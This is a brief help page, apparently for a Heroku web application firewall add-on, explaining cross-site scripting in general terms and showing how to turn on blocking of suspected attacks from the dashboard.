How to Block HTML in forms (XSS) on Heroku
Why you might need this
Cross-Site Scripting (XSS) attacks are one of the most frequent types of attacks executed against web applications. Typically malicious Javascript code is injected into an application through a form endpoint that is improperly sanitizing inputs.
Once the code has been injected, it can be used to steal data from users, launch malware and other nefarious and damaging activity.
Prerequisites
What you need to get started:
- Expedited WAF add-on is setup in front of your application.
How To Stop XSS Attacks
On the Stop Attacks page of your Expedited WAF dashboard, select the Stop Suspected Attacks option.
Notes
- If you have forms on your site that allow HTML or Javascript inputs you may need to exempt those URLs from checking.
- Stopping suspected attacks is a an additional layer of security on your site and should function alongside solid development practices, patching and testing
Resources
More reading and framework resources on prevention of XSS attacks